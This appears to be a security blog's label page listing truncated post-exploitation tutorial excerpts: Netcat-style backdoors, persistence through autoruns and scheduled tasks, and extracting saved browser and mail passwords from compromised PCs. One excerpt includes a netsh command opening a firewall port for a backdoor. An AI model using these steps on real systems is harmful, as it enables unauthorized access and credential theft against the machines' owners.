Showing posts with label post-exploitation. Show all posts
Showing posts with label post-exploitation. Show all posts
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Backdoor using Netcat, cryptcat , ncat.

Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command.netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALLAttacker `s I.P :`s...
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Get shell using Missing Autoruns.

In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever...
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Schedule Task in windows after Exploitation.

Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But...
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Extract & decrypt Chrome & IE passwords from Remote PC

In previous post i mentioned how we can extract saved passwords from firefox & thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome & IE. If you want to know more technical detail you can visit this site.Chrome stores all the sign-on secrets into the internal database file...
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Extract & decrypt passwords from Firefox & Thunderbird.

Today we are going to extract password from Fireox & Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.Most of the morden browser save...